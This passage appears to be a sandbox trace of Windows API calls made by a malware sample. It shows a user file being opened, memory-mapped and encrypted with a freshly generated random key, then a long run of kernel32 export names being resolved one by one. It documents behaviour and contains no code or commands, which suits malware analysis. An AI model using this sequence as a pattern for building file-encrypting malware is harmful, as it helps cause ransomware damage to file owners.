HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qd1ysnso4kvgu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.380] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=13666) returned 1 [0082.380] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.380] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.380] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.380] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.380] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.381] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.381] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.381] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.382] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.382] CloseHandle (hObject=0x444) returned 1 [0082.382] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.382] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.383] CloseHandle (hObject=0x0) returned 0 [0082.383] CloseHandle (hObject=0x440) returned 1 [0082.383] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.383] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.383] GetTickCount () returned 0x114d125 [0082.383] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.384] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.384] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.384] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.384] lstrlenA (lpString="kernel32.dll") returned 12 [0082.384] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.384] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.385] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.385] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.385] lstrlenA (lpString="ADDATOMA") returned 8 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.385] lstrlenA (lpString="ADDATOMW") returned 8 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.385] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.385] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.385] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.385] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.385] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.385] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.385] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.385] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.385] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.385] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.385] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.385] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.385] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.385] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.386] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.386] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.386] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.386] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.386] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.386] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.386] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.386] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.386] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.386] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.386] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.386] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.386] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.386] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.386] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.386] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.386] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.386] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.387] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.387] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.387] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.387] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.387] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.387] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.387] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.387] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.387] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.387] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.387] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.387] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.387] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.387] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.387] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.387] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.387] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.387] lstrlenA (lpString="BEEP") returned 4 [0082.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.387] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.388] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.388] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.388] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.388] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.388] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.388] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.388] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.388] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.388] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.388] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.388] lstrlenA (lpString="CANCELIO") returned 8 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.388] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.388] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.388] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.388] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.388] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.388] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.388] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.389] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.389] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.389] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.389] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.389] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.389] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.389] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.389] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.389] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.389] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.389] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.389] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.389] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.389] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.389] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.389] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.389] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.389] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.390] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.390] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.390] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.390] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.390] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.390] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.390] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.390] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.390] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.390] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.390] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.390] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.390] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.390] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.390] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 